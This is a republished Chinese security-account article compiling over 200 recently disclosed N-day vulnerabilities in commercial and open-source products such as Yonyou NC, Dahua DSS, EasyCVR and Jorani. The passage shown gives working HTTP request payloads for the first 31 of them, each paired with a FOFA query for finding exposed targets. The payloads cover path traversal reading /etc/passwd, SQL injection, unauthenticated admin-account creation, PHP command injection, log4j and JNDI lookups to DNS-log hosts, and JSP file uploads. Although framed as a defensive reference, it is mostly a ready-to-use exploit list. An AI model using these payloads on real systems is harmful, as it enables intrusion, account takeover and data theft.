Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article originates from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities makes up a large share of real-world attacks; we hope this article helps with your defence. Defenders can use its contents to check their own exposure.

Sources: This article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them were taken from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Patches: All of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: Because of length constraints, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: If any content in this article infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend to have it removed.

Statement
To keep things simple and easy to browse, there is no "reply to receive the full list" gate. This article is the complete, most up-to-date list; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful, and feel free to follow the public account (网络安全新视界).

Contents
01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle location monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 omni-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload
POC list

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain a cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected function runs a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
 <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
 <netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
 </netMarkings>
 </ns1:deleteBulletin>
 </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--


25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp


29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
